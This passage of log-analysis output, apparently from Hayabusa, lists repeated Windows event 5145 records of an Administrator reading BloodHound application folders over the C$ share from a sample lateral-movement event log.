Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ 
: Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 : 
IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist : IP Address: 
